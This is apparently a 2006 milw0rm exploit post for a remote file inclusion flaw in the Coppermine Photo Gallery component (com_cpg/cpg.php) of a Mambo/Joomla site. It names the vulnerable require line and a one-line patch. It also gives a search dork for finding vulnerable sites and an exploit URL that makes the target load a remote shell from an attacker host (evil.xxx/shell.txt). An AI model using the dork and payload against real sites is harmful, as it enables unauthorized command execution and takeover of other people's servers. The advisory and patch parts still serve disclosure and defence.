34 lines
No EOL
531 B
Text
34 lines
No EOL
531 B
Text
########### CopperminePhotoGallery Component ###########
|
|
Found By k1tk4t
|
|
Indonesia
|
|
|
|
This bug allows a remote atacker to execute commands via RFI
|
|
|
|
file:
|
|
cpg.php
|
|
|
|
bug:
|
|
require ($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");
|
|
|
|
|
|
|
|
path:
|
|
add in cpg.php
|
|
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );
|
|
|
|
dork: inurl:com_cpg
|
|
|
|
expl:
|
|
htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=
|
|
|
|
http://evil.xxx/shell.txt?
|
|
|
|
|
|
thanks to
|
|
|
|
e-c-h-o
|
|
h4cky0u
|
|
milw0rm
|
|
google
|
|
|
|
# milw0rm.com [2006-08-16] |